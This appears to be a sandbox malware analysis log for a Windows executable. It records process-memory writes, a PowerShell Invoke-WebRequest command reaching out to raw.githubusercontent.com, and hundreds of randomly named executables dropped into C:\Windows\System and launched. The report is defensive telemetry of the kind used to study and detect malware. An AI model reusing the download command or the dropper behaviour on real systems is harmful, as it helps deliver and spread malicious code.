PID 2800 wrote to memory of 1188	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	105
PID 2800 wrote to memory of 1188	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	105
PID 2800 wrote to memory of 5056	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	106
PID 2800 wrote to memory of 5056	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	106
PID 2800 wrote to memory of 1564	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	107
PID 2800 wrote to memory of 1564	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	107
PID 2800 wrote to memory of 2316	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	108
PID 2800 wrote to memory of 2316	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	108
PID 2800 wrote to memory of 3108	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	109
PID 2800 wrote to memory of 3108	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	109
PID 2800 wrote to memory of 3156	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	110
PID 2800 wrote to memory of 3156	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	110
PID 2800 wrote to memory of 4608	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	111
PID 2800 wrote to memory of 4608	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	111
PID 2800 wrote to memory of 4976	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	112
PID 2800 wrote to memory of 4976	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	112
PID 2800 wrote to memory of 628	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	113
PID 2800 wrote to memory of 628	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	113
PID 2800 wrote to memory of 5052	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	114
PID 2800 wrote to memory of 5052	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	114
PID 2800 wrote to memory of 1584	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	115
PID 2800 wrote to memory of 1584	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	115

C:\Users\Admin\AppData\Local\Temp\315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2800
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2820
- C:\Windows\System\ZwCeRCo.exe
  C:\Windows\System\ZwCeRCo.exe
  2⤵
  - Executes dropped EXE
  PID:3844
- C:\Windows\System\lHoKhzI.exe
  C:\Windows\System\lHoKhzI.exe
  2⤵
  - Executes dropped EXE
  PID:5012
- C:\Windows\System\ofgqRYi.exe
  C:\Windows\System\ofgqRYi.exe
  2⤵
  - Executes dropped EXE
  PID:4340
- C:\Windows\System\VHrexKo.exe
  C:\Windows\System\VHrexKo.exe
  2⤵
  - Executes dropped EXE
  PID:4736
- C:\Windows\System\AsqNDeA.exe
  C:\Windows\System\AsqNDeA.exe
  2⤵
  - Executes dropped EXE
  PID:2880
- C:\Windows\System\wzRTGpC.exe
  C:\Windows\System\wzRTGpC.exe
  2⤵
  - Executes dropped EXE
  PID:2932
- C:\Windows\System\JkBrHnG.exe
  C:\Windows\System\JkBrHnG.exe
  2⤵
  - Executes dropped EXE
  PID:2232
- C:\Windows\System\Cocumug.exe
  C:\Windows\System\Cocumug.exe
  2⤵
  - Executes dropped EXE
  PID:1796
- C:\Windows\System\pJUWqvY.exe
  C:\Windows\System\pJUWqvY.exe
  2⤵
  - Executes dropped EXE
  PID:2096
- C:\Windows\System\UgTbiCs.exe
  C:\Windows\System\UgTbiCs.exe
  2⤵
  - Executes dropped EXE
  PID:1616
- C:\Windows\System\YWChqwz.exe
  C:\Windows\System\YWChqwz.exe
  2⤵
  - Executes dropped EXE
  PID:928
- C:\Windows\System\QDavlGU.exe
  C:\Windows\System\QDavlGU.exe
  2⤵
  - Executes dropped EXE
  PID:2448
- C:\Windows\System\SdSHPhg.exe
  C:\Windows\System\SdSHPhg.exe
  2⤵
  - Executes dropped EXE
  PID:1104
- C:\Windows\System\iwsNFMw.exe
  C:\Windows\System\iwsNFMw.exe
  2⤵
  - Executes dropped EXE
  PID:3620
- C:\Windows\System\WnlJqCo.exe
  C:\Windows\System\WnlJqCo.exe
  2⤵
  - Executes dropped EXE
  PID:5020
- C:\Windows\System\MeVavpX.exe
  C:\Windows\System\MeVavpX.exe
  2⤵
  - Executes dropped EXE
  PID:2436
- C:\Windows\System\gItkTfn.exe
  C:\Windows\System\gItkTfn.exe
  2⤵
  - Executes dropped EXE
  PID:644
- C:\Windows\System\JizsrYz.exe
  C:\Windows\System\JizsrYz.exe
  2⤵
  - Executes dropped EXE
  PID:2308
- C:\Windows\System\EKSCdKC.exe
  C:\Windows\System\EKSCdKC.exe
  2⤵
  - Executes dropped EXE
  PID:3320
- C:\Windows\System\pPNfzxI.exe
  C:\Windows\System\pPNfzxI.exe
  2⤵
  - Executes dropped EXE
  PID:3412
- C:\Windows\System\srOXrVr.exe
  C:\Windows\System\srOXrVr.exe
  2⤵
  - Executes dropped EXE
  PID:1188
- C:\Windows\System\FKnymPf.exe
  C:\Windows\System\FKnymPf.exe
  2⤵
  - Executes dropped EXE
  PID:5056
- C:\Windows\System\bSffvpr.exe
  C:\Windows\System\bSffvpr.exe
  2⤵
  - Executes dropped EXE
  PID:1564
- C:\Windows\System\NuFRvzL.exe
  C:\Windows\System\NuFRvzL.exe
  2⤵
  - Executes dropped EXE
  PID:2316
- C:\Windows\System\RXopuhZ.exe
  C:\Windows\System\RXopuhZ.exe
  2⤵
  - Executes dropped EXE
  PID:3108
- C:\Windows\System\mqScaLQ.exe
  C:\Windows\System\mqScaLQ.exe
  2⤵
  - Executes dropped EXE
  PID:3156
- C:\Windows\System\WsBHtRM.exe
  C:\Windows\System\WsBHtRM.exe
  2⤵
  - Executes dropped EXE
  PID:4608
- C:\Windows\System\DpTEilI.exe
  C:\Windows\System\DpTEilI.exe
  2⤵
  - Executes dropped EXE
  PID:4976
- C:\Windows\System\rVlVRzD.exe
  C:\Windows\System\rVlVRzD.exe
  2⤵
  - Executes dropped EXE
  PID:628
- C:\Windows\System\hjOXYBz.exe
  C:\Windows\System\hjOXYBz.exe
  2⤵
  - Executes dropped EXE
  PID:5052
- C:\Windows\System\XpXTLXc.exe
  C:\Windows\System\XpXTLXc.exe
  2⤵
  - Executes dropped EXE
  PID:1584
- C:\Windows\System\yADMCoL.exe
  C:\Windows\System\yADMCoL.exe
  2⤵
  - Executes dropped EXE
  PID:1488
- C:\Windows\System\AnxJfnB.exe
  C:\Windows\System\AnxJfnB.exe
  2⤵
  - Executes dropped EXE
  PID:4524
- C:\Windows\System\rDPmvGJ.exe
  C:\Windows\System\rDPmvGJ.exe
  2⤵
  - Executes dropped EXE
  PID:4612
- C:\Windows\System\dyIseZV.exe
  C:\Windows\System\dyIseZV.exe
  2⤵
  - Executes dropped EXE
  PID:4372
- C:\Windows\System\RHPyiOa.exe
  C:\Windows\System\RHPyiOa.exe
  2⤵
  - Executes dropped EXE
  PID:2180
- C:\Windows\System\MsTWLBN.exe
  C:\Windows\System\MsTWLBN.exe
  2⤵
  - Executes dropped EXE
  PID:2860
- C:\Windows\System\efLvPGo.exe
  C:\Windows\System\efLvPGo.exe
  2⤵
  - Executes dropped EXE
  PID:4348
- C:\Windows\System\GklpqzW.exe
  C:\Windows\System\GklpqzW.exe
  2⤵
  - Executes dropped EXE
  PID:5064
- C:\Windows\System\mNvZcMS.exe
  C:\Windows\System\mNvZcMS.exe
  2⤵
  - Executes dropped EXE
  PID:4328
- C:\Windows\System\YECmHiE.exe
  C:\Windows\System\YECmHiE.exe
  2⤵
  - Executes dropped EXE
  PID:4336
- C:\Windows\System\ZZlMtni.exe
  C:\Windows\System\ZZlMtni.exe
  2⤵
  - Executes dropped EXE
  PID:716
- C:\Windows\System\uJhvJDe.exe
  C:\Windows\System\uJhvJDe.exe
  2⤵
  - Executes dropped EXE
  PID:1124
- C:\Windows\System\WxkEXXd.exe
  C:\Windows\System\WxkEXXd.exe
  2⤵
  - Executes dropped EXE
  PID:4356
- C:\Windows\System\DwOLavC.exe
  C:\Windows\System\DwOLavC.exe
  2⤵
  - Executes dropped EXE
  PID:2964
- C:\Windows\System\XmSaWSr.exe
  C:\Windows\System\XmSaWSr.exe
  2⤵
  - Executes dropped EXE
  PID:5040
- C:\Windows\System\Kgdeyyt.exe
  C:\Windows\System\Kgdeyyt.exe
  2⤵
  - Executes dropped EXE
  PID:4720
- C:\Windows\System\iUMmTse.exe
  C:\Windows\System\iUMmTse.exe
  2⤵
  - Executes dropped EXE
  PID:4808
- C:\Windows\System\OEeUDCH.exe
  C:\Windows\System\OEeUDCH.exe
  2⤵
  - Executes dropped EXE
  PID:2936
- C:\Windows\System\FzhhZBv.exe
  C:\Windows\System\FzhhZBv.exe
  2⤵
  - Executes dropped EXE
  PID:5080
- C:\Windows\System\czeEzgh.exe
  C:\Windows\System\czeEzgh.exe
  2⤵
  - Executes dropped EXE
  PID:2912
- C:\Windows\System\lIEFrke.exe
  C:\Windows\System\lIEFrke.exe
  2⤵
  - Executes dropped EXE
  PID:5024
- C:\Windows\System\bUjMpmM.exe
  C:\Windows\System\bUjMpmM.exe
  2⤵
  - Executes dropped EXE
  PID:2292
- C:\Windows\System\ACcgBZQ.exe
  C:\Windows\System\ACcgBZQ.exe
  2⤵
  - Executes dropped EXE
  PID:728
- C:\Windows\System\LXAHDLI.exe
  C:\Windows\System\LXAHDLI.exe
  2⤵
  - Executes dropped EXE
  PID:4908
- C:\Windows\System\jdvXMAY.exe
  C:\Windows\System\jdvXMAY.exe
  2⤵
  - Executes dropped EXE
  PID:412
- C:\Windows\System\cxgUOwF.exe
  C:\Windows\System\cxgUOwF.exe
  2⤵
  - Executes dropped EXE
  PID:2728
- C:\Windows\System\ernjJJy.exe
  C:\Windows\System\ernjJJy.exe
  2⤵
  - Executes dropped EXE
  PID:4388
- C:\Windows\System\PTvHZtv.exe
  C:\Windows\System\PTvHZtv.exe
  2⤵
  - Executes dropped EXE
  PID:3504
- C:\Windows\System\BikgeuY.exe
  C:\Windows\System\BikgeuY.exe
  2⤵
  - Executes dropped EXE
  PID:2400
- C:\Windows\System\aSENcYM.exe
  C:\Windows\System\aSENcYM.exe
  2⤵
  - Executes dropped EXE
  PID:2712
- C:\Windows\System\kWFEeKf.exe
  C:\Windows\System\kWFEeKf.exe
  2⤵
  - Executes dropped EXE
  PID:1492
- C:\Windows\System\vWOshAL.exe
  C:\Windows\System\vWOshAL.exe
  2⤵
  - Executes dropped EXE
  PID:376
- C:\Windows\System\YgKvVTH.exe
  C:\Windows\System\YgKvVTH.exe
  2⤵
  - Executes dropped EXE
  PID:4364
- C:\Windows\System\CdiLWBx.exe
  C:\Windows\System\CdiLWBx.exe
  2⤵
  PID:4272
- C:\Windows\System\xWEkCjK.exe
  C:\Windows\System\xWEkCjK.exe
  2⤵
  PID:2960
- C:\Windows\System\ipvGEGH.exe
  C:\Windows\System\ipvGEGH.exe
  2⤵
  PID:444
- C:\Windows\System\xgtowvj.exe
  C:\Windows\System\xgtowvj.exe
  2⤵
  PID:5004
- C:\Windows\System\bTlrTBk.exe
  C:\Windows\System\bTlrTBk.exe
  2⤵
  PID:2352
- C:\Windows\System\KcGCdfV.exe
  C:\Windows\System\KcGCdfV.exe
  2⤵
  PID:4332
- C:\Windows\System\XZWZBKk.exe
  C:\Windows\System\XZWZBKk.exe
  2⤵
  PID:5152
- C:\Windows\System\JVaeZGN.exe
  C:\Windows\System\JVaeZGN.exe
  2⤵
  PID:5176
- C:\Windows\System\YimAOzD.exe
  C:\Windows\System\YimAOzD.exe
  2⤵
  PID:5208
- C:\Windows\System\IbmiuQc.exe
  C:\Windows\System\IbmiuQc.exe
  2⤵
  PID:5236
- C:\Windows\System\oDFolcs.exe
  C:\Windows\System\oDFolcs.exe
  2⤵
  PID:5264
- C:\Windows\System\PvvHJfD.exe
  C:\Windows\System\PvvHJfD.exe
  2⤵
  PID:5292
- C:\Windows\System\dooAWtz.exe
  C:\Windows\System\dooAWtz.exe
  2⤵
  PID:5340
- C:\Windows\System\RrXlTKp.exe
  C:\Windows\System\RrXlTKp.exe
  2⤵
  PID:5364
- C:\Windows\System\NdOuiYi.exe
  C:\Windows\System\NdOuiYi.exe
  2⤵
  PID:5388
- C:\Windows\System\XhyQTAK.exe
  C:\Windows\System\XhyQTAK.exe
  2⤵
  PID:5412
- C:\Windows\System\zkTwKsT.exe
  C:\Windows\System\zkTwKsT.exe
  2⤵
  PID:5432
- C:\Windows\System\DijwbcI.exe
  C:\Windows\System\DijwbcI.exe
  2⤵
  PID:5460
- C:\Windows\System\qmXNteA.exe
  C:\Windows\System\qmXNteA.exe
  2⤵
  PID:5484
- C:\Windows\System\YhTnGhg.exe
  C:\Windows\System\YhTnGhg.exe
  2⤵
  PID:5512
- C:\Windows\System\sPgSpEl.exe
  C:\Windows\System\sPgSpEl.exe
  2⤵
  PID:5544
- C:\Windows\System\JrAtvKK.exe
  C:\Windows\System\JrAtvKK.exe
  2⤵
  PID:5568
- C:\Windows\System\cLghwKV.exe
  C:\Windows\System\cLghwKV.exe
  2⤵
  PID:5596
- C:\Windows\System\jZDGwsQ.exe
  C:\Windows\System\jZDGwsQ.exe
  2⤵
  PID:5624
- C:\Windows\System\uvSEWHx.exe
  C:\Windows\System\uvSEWHx.exe
  2⤵
  PID:5656
- C:\Windows\System\tcdRJaN.exe
  C:\Windows\System\tcdRJaN.exe
  2⤵
  PID:5684
- C:\Windows\System\hYtiYqG.exe
  C:\Windows\System\hYtiYqG.exe
  2⤵
  PID:5736
- C:\Windows\System\splUQtH.exe
  C:\Windows\System\splUQtH.exe
  2⤵
  PID:5772
- C:\Windows\System\tVrgHjJ.exe
  C:\Windows\System\tVrgHjJ.exe
  2⤵
  PID:5796
- C:\Windows\System\iHJrZiw.exe
  C:\Windows\System\iHJrZiw.exe
  2⤵
  PID:5816
- C:\Windows\System\XdzbcKR.exe
  C:\Windows\System\XdzbcKR.exe
  2⤵
  PID:5836
- C:\Windows\System\GISXknB.exe
  C:\Windows\System\GISXknB.exe
  2⤵
  PID:5856
- C:\Windows\System\CwVOOrD.exe
  C:\Windows\System\CwVOOrD.exe
  2⤵
  PID:5908
- C:\Windows\System\NvMJLQt.exe
  C:\Windows\System\NvMJLQt.exe
  2⤵
  PID:5924
- C:\Windows\System\NgQpkxv.exe
  C:\Windows\System\NgQpkxv.exe
  2⤵
  PID:5948
- C:\Windows\System\FcdZSQO.exe
  C:\Windows\System\FcdZSQO.exe
  2⤵
  PID:6000
- C:\Windows\System\fKJwkcA.exe
  C:\Windows\System\fKJwkcA.exe
  2⤵
  PID:6020
- C:\Windows\System\WoUnkRs.exe
  C:\Windows\System\WoUnkRs.exe
  2⤵
  PID:6040
- C:\Windows\System\AfQuwZf.exe
  C:\Windows\System\AfQuwZf.exe
  2⤵
  PID:6072
- C:\Windows\System\AbaOxiM.exe
  C:\Windows\System\AbaOxiM.exe
  2⤵
  PID:6088
- C:\Windows\System\mOdqvxy.exe
  C:\Windows\System\mOdqvxy.exe
  2⤵
  PID:6112
- C:\Windows\System\RPPpZRx.exe
  C:\Windows\System\RPPpZRx.exe
  2⤵
  PID:2028
- C:\Windows\System\mtDeBaD.exe
  C:\Windows\System\mtDeBaD.exe
  2⤵
  PID:400
- C:\Windows\System\frzuTru.exe
  C:\Windows\System\frzuTru.exe
  2⤵
  PID:4392
- C:\Windows\System\VYNisxj.exe
  C:\Windows\System\VYNisxj.exe
  2⤵
  PID:3628
- C:\Windows\System\ZAfcpfO.exe
  C:\Windows\System\ZAfcpfO.exe
  2⤵
  PID:4616
- C:\Windows\System\yaiDocA.exe
  C:\Windows\System\yaiDocA.exe
  2⤵
  PID:3408
- C:\Windows\System\KabcpwJ.exe
  C:\Windows\System\KabcpwJ.exe
  2⤵
  PID:5140
- C:\Windows\System\WgRRswQ.exe
  C:\Windows\System\WgRRswQ.exe
  2⤵
  PID:5172
- C:\Windows\System\ZAKZpDW.exe
  C:\Windows\System\ZAKZpDW.exe
  2⤵
  PID:5224
- C:\Windows\System\kpjZPax.exe
  C:\Windows\System\kpjZPax.exe
  2⤵
  PID:5336
- C:\Windows\System\WyLpMGq.exe
  C:\Windows\System\WyLpMGq.exe
  2⤵
  PID:5380
- C:\Windows\System\gMIaUle.exe
  C:\Windows\System\gMIaUle.exe
  2⤵
  PID:5508
- C:\Windows\System\FnAvkyA.exe
  C:\Windows\System\FnAvkyA.exe
  2⤵
  PID:1360
- C:\Windows\System\DqnbUrB.exe
  C:\Windows\System\DqnbUrB.exe
  2⤵
  PID:5592
- C:\Windows\System\LRCGFGS.exe
  C:\Windows\System\LRCGFGS.exe
  2⤵
  PID:5676
- C:\Windows\System\pbIVSer.exe
  C:\Windows\System\pbIVSer.exe
  2⤵
  PID:5760
- C:\Windows\System\ZUBDtoz.exe
  C:\Windows\System\ZUBDtoz.exe
  2⤵
  PID:3816
- C:\Windows\System\SuplZKs.exe
  C:\Windows\System\SuplZKs.exe
  2⤵
  PID:5812
- C:\Windows\System\hQQqddi.exe
  C:\Windows\System\hQQqddi.exe
  2⤵
  PID:6016
- C:\Windows\System\mnLeJKo.exe
  C:\Windows\System\mnLeJKo.exe
  2⤵
  PID:6084
- C:\Windows\System\tkxnPpj.exe
  C:\Windows\System\tkxnPpj.exe
  2⤵
  PID:4464
- C:\Windows\System\gLmlZkp.exe
  C:\Windows\System\gLmlZkp.exe
  2⤵
  PID:5476
- C:\Windows\System\kjAmYVF.exe
  C:\Windows\System\kjAmYVF.exe
  2⤵
  PID:5308
- C:\Windows\System\euGsjes.exe
  C:\Windows\System\euGsjes.exe
  2⤵
  PID:5644
- C:\Windows\System\unfUmDG.exe
  C:\Windows\System\unfUmDG.exe
  2⤵
  PID:5696
- C:\Windows\System\lcfhWQv.exe
  C:\Windows\System\lcfhWQv.exe
  2⤵
  PID:5612
- C:\Windows\System\HaKoCyL.exe
  C:\Windows\System\HaKoCyL.exe
  2⤵
  PID:1220
- C:\Windows\System\fRysupr.exe
  C:\Windows\System\fRysupr.exe
  2⤵
  PID:5060
- C:\Windows\System\aiPLBrN.exe
  C:\Windows\System\aiPLBrN.exe
  2⤵
  PID:5844
- C:\Windows\System\BmTITrz.exe
  C:\Windows\System\BmTITrz.exe
  2⤵
  PID:5900
- C:\Windows\System\ZgedOXx.exe
  C:\Windows\System\ZgedOXx.exe
  2⤵
  PID:6056
- C:\Windows\System\JaEIHto.exe
  C:\Windows\System\JaEIHto.exe
  2⤵
  PID:2288
- C:\Windows\System\otLHDpT.exe
  C:\Windows\System\otLHDpT.exe
  2⤵
  PID:3888
- C:\Windows\System\siqrmPk.exe
  C:\Windows\System\siqrmPk.exe
  2⤵
  PID:5072
- C:\Windows\System\wMczJSn.exe
  C:\Windows\System\wMczJSn.exe
  2⤵
  PID:2992
- C:\Windows\System\FQoJPRu.exe
  C:\Windows\System\FQoJPRu.exe
  2⤵
  PID:1872
- C:\Windows\System\yHRepKn.exe
  C:\Windows\System\yHRepKn.exe
  2⤵
  PID:5428
- C:\Windows\System\xrXkGnN.exe
  C:\Windows\System\xrXkGnN.exe
  2⤵
  PID:3712
- C:\Windows\System\uukZtgA.exe
  C:\Windows\System\uukZtgA.exe
  2⤵
  PID:6148
- C:\Windows\System\EYaihjt.exe
  C:\Windows\System\EYaihjt.exe
  2⤵
  PID:6216
- C:\Windows\System\StBKSYh.exe
  C:\Windows\System\StBKSYh.exe
  2⤵
  PID:6248
- C:\Windows\System\OtFIIvm.exe
  C:\Windows\System\OtFIIvm.exe
  2⤵
  PID:6264
- C:\Windows\System\aPqcRwh.exe
  C:\Windows\System\aPqcRwh.exe
  2⤵
  PID:6284
- C:\Windows\System\VuYQazL.exe
  C:\Windows\System\VuYQazL.exe
  2⤵
  PID:6324
- C:\Windows\System\DnEdtYK.exe
  C:\Windows\System\DnEdtYK.exe
  2⤵
  PID:6392
- C:\Windows\System\McYMqaA.exe
  C:\Windows\System\McYMqaA.exe
  2⤵
  PID:6476
- C:\Windows\System\JRvTHwo.exe
  C:\Windows\System\JRvTHwo.exe
  2⤵
  PID:6496
- C:\Windows\System\rkXrGoH.exe
  C:\Windows\System\rkXrGoH.exe
  2⤵
  PID:6512
- C:\Windows\System\JgjlaNa.exe
  C:\Windows\System\JgjlaNa.exe
  2⤵
  PID:6544
- C:\Windows\System\daKnNKz.exe
  C:\Windows\System\daKnNKz.exe
  2⤵
  PID:6560
- C:\Windows\System\gGSsQPY.exe
  C:\Windows\System\gGSsQPY.exe
  2⤵
  PID:6588
- C:\Windows\System\HLbqPfM.exe
  C:\Windows\System\HLbqPfM.exe
  2⤵
  PID:6608
- C:\Windows\System\ePzAmcP.exe
  C:\Windows\System\ePzAmcP.exe
  2⤵
  PID:6656
- C:\Windows\System\yCTkjjY.exe
  C:\Windows\System\yCTkjjY.exe
  2⤵
  PID:6684
- C:\Windows\System\DVTUcSa.exe
  C:\Windows\System\DVTUcSa.exe
  2⤵
  PID:6712
- C:\Windows\System\DtchZeL.exe
  C:\Windows\System\DtchZeL.exe
  2⤵
  PID:6744
- C:\Windows\System\cRMwqWX.exe
  C:\Windows\System\cRMwqWX.exe
  2⤵
  PID:6768
- C:\Windows\System\rQZRiml.exe
  C:\Windows\System\rQZRiml.exe
  2⤵
  PID:6784
- C:\Windows\System\JimNYwP.exe
  C:\Windows\System\JimNYwP.exe
  2⤵
  PID:6812
- C:\Windows\System\zjBVswg.exe
  C:\Windows\System\zjBVswg.exe
  2⤵
  PID:6832
- C:\Windows\System\cutUyih.exe
  C:\Windows\System\cutUyih.exe
  2⤵
  PID:6848
- C:\Windows\System\JJTHrRw.exe
  C:\Windows\System\JJTHrRw.exe
  2⤵
  PID:6872
- C:\Windows\System\ePfyywb.exe
  C:\Windows\System\ePfyywb.exe
  2⤵
  PID:6916
- C:\Windows\System\ThBUVSG.exe
  C:\Windows\System\ThBUVSG.exe
  2⤵
  PID:6940
- C:\Windows\System\mAbKgvJ.exe
  C:\Windows\System\mAbKgvJ.exe
  2⤵
  PID:6988
- C:\Windows\System\SDmtAmv.exe
  C:\Windows\System\SDmtAmv.exe
  2⤵
  PID:7028
- C:\Windows\System\ENqRbRV.exe
  C:\Windows\System\ENqRbRV.exe
  2⤵
  PID:7048
- C:\Windows\System\XGuERPz.exe
  C:\Windows\System\XGuERPz.exe
  2⤵
  PID:7068
- C:\Windows\System\BBfjQCv.exe
  C:\Windows\System\BBfjQCv.exe
  2⤵
  PID:7088
- C:\Windows\System\YkDavJk.exe
  C:\Windows\System\YkDavJk.exe
  2⤵
  PID:7104
- C:\Windows\System\xjUYJcn.exe
  C:\Windows\System\xjUYJcn.exe
  2⤵
  PID:7124
- C:\Windows\System\VMLidQH.exe
  C:\Windows\System\VMLidQH.exe
  2⤵
  PID:7152
- C:\Windows\System\vIlJOGt.exe
  C:\Windows\System\vIlJOGt.exe
  2⤵
  PID:1792
- C:\Windows\System\uhexhYc.exe
  C:\Windows\System\uhexhYc.exe
  2⤵
  PID:5444
- C:\Windows\System\BdZrNll.exe
  C:\Windows\System\BdZrNll.exe
  2⤵
  PID:6228
- C:\Windows\System\ZxWYqoE.exe
  C:\Windows\System\ZxWYqoE.exe
  2⤵
  PID:6332
- C:\Windows\System\wQTrBJN.exe
  C:\Windows\System\wQTrBJN.exe
  2⤵
  PID:6352
- C:\Windows\System\zUddSeX.exe
  C:\Windows\System\zUddSeX.exe
  2⤵
  PID:6372
- C:\Windows\System\YWecsBQ.exe
  C:\Windows\System\YWecsBQ.exe
  2⤵
  PID:6428
- C:\Windows\System\IdMXupc.exe
  C:\Windows\System\IdMXupc.exe
  2⤵
  PID:6492
- C:\Windows\System\VUBXsvP.exe
  C:\Windows\System\VUBXsvP.exe
  2⤵
  PID:6524
- C:\Windows\System\OzpbMiV.exe
  C:\Windows\System\OzpbMiV.exe
  2⤵
  PID:6664
- C:\Windows\System\gCWGIaN.exe
  C:\Windows\System\gCWGIaN.exe
  2⤵
  PID:6700
- C:\Windows\System\bmrllAE.exe
  C:\Windows\System\bmrllAE.exe
  2⤵
  PID:6724
- C:\Windows\System\IOZjNWQ.exe
  C:\Windows\System\IOZjNWQ.exe
  2⤵
  PID:6780
- C:\Windows\System\wUCiqOJ.exe
  C:\Windows\System\wUCiqOJ.exe
  2⤵
  PID:6844
- C:\Windows\System\BvTzeMa.exe
  C:\Windows\System\BvTzeMa.exe
  2⤵
  PID:6912
- C:\Windows\System\xHVDxSM.exe
  C:\Windows\System\xHVDxSM.exe
  2⤵
  PID:6972
- C:\Windows\System\EHvQQEH.exe
  C:\Windows\System\EHvQQEH.exe
  2⤵
  PID:6996
- C:\Windows\System\xRlrPaO.exe
  C:\Windows\System\xRlrPaO.exe
  2⤵
  PID:7040
- C:\Windows\System\LPjtevp.exe
  C:\Windows\System\LPjtevp.exe
  2⤵
  PID:7120
- C:\Windows\System\LpFFQhS.exe
  C:\Windows\System\LpFFQhS.exe
  2⤵
  PID:7144
- C:\Windows\System\mLYshCk.exe
  C:\Windows\System\mLYshCk.exe
  2⤵
  PID:6052
- C:\Windows\System\RKPDyKn.exe
  C:\Windows\System\RKPDyKn.exe
  2⤵
  PID:1504
- C:\Windows\System\qtIDNbB.exe
  C:\Windows\System\qtIDNbB.exe
  2⤵
  PID:6136
- C:\Windows\System\JKxIYJP.exe
  C:\Windows\System\JKxIYJP.exe
  2⤵
  PID:6304
- C:\Windows\System\mMFLMQq.exe
  C:\Windows\System\mMFLMQq.exe
  2⤵
  PID:5804
- C:\Windows\System\BwcVvfP.exe
  C:\Windows\System\BwcVvfP.exe
  2⤵
  PID:1012
- C:\Windows\System\XkxZpAp.exe
  C:\Windows\System\XkxZpAp.exe
  2⤵
  PID:6676
- C:\Windows\System\qHuUzNM.exe
  C:\Windows\System\qHuUzNM.exe
  2⤵
  PID:232
- C:\Windows\System\ijroIUD.exe
  C:\Windows\System\ijroIUD.exe
  2⤵
  PID:2764
- C:\Windows\System\dhfYzhb.exe
  C:\Windows\System\dhfYzhb.exe
  2⤵
  PID:7016
- C:\Windows\System\epYJHMS.exe
  C:\Windows\System\epYJHMS.exe
  2⤵
  PID:7080
- C:\Windows\System\lQkkJYl.exe
  C:\Windows\System\lQkkJYl.exe
  2⤵
  PID:6348
- C:\Windows\System\GNIzjMJ.exe
  C:\Windows\System\GNIzjMJ.exe
  2⤵
  PID:6908
- C:\Windows\System\tiYNpXc.exe
  C:\Windows\System\tiYNpXc.exe
  2⤵
  PID:2200
- C:\Windows\System\eKXikdh.exe
  C:\Windows\System\eKXikdh.exe
  2⤵
  PID:5036
- C:\Windows\System\PSJRxxZ.exe
  C:\Windows\System\PSJRxxZ.exe
  2⤵
  PID:4996
- C:\Windows\System\QQzWzwg.exe
  C:\Windows\System\QQzWzwg.exe
  2⤵
  PID:7208
- C:\Windows\System\TQZwQop.exe
  C:\Windows\System\TQZwQop.exe
  2⤵
  PID:7228
- C:\Windows\System\oIEDWdM.exe
  C:\Windows\System\oIEDWdM.exe
  2⤵
  PID:7264
- C:\Windows\System\FwtkeqG.exe
  C:\Windows\System\FwtkeqG.exe
  2⤵
  PID:7280
- C:\Windows\System\yrRIegm.exe
  C:\Windows\System\yrRIegm.exe
  2⤵
  PID:7320
- C:\Windows\System\BaYAxXj.exe
  C:\Windows\System\BaYAxXj.exe
  2⤵
  PID:7344
- C:\Windows\System\KemGjOK.exe
  C:\Windows\System\KemGjOK.exe
  2⤵
  PID:7364
- C:\Windows\System\xkUbeXm.exe
  C:\Windows\System\xkUbeXm.exe
  2⤵
  PID:7380
- C:\Windows\System\xSATVgr.exe
  C:\Windows\System\xSATVgr.exe
  2⤵
  PID:7404
- C:\Windows\System\TnSzmCg.exe
  C:\Windows\System\TnSzmCg.exe
  2⤵
  PID:7448
- C:\Windows\System\wphRLMw.exe
  C:\Windows\System\wphRLMw.exe
  2⤵
  PID:7464
- C:\Windows\System\zOPgFOU.exe
  C:\Windows\System\zOPgFOU.exe
  2⤵
  PID:7508
- C:\Windows\System\sxchEQW.exe
  C:\Windows\System\sxchEQW.exe
  2⤵
  PID:7532
- C:\Windows\System\xHEReiu.exe
  C:\Windows\System\xHEReiu.exe
  2⤵
  PID:7548
- C:\Windows\System\fzfmJai.exe
  C:\Windows\System\fzfmJai.exe
  2⤵
  PID:7592
- C:\Windows\System\HSmILIa.exe
  C:\Windows\System\HSmILIa.exe
  2⤵
  PID:7648
- C:\Windows\System\MfNPRqB.exe
  C:\Windows\System\MfNPRqB.exe
  2⤵
  PID:7668
- C:\Windows\System\IwNJmrE.exe
  C:\Windows\System\IwNJmrE.exe
  2⤵
  PID:7684
- C:\Windows\System\ddyGBLI.exe
  C:\Windows\System\ddyGBLI.exe
  2⤵
  PID:7708
- C:\Windows\System\ezQrupH.exe
  C:\Windows\System\ezQrupH.exe
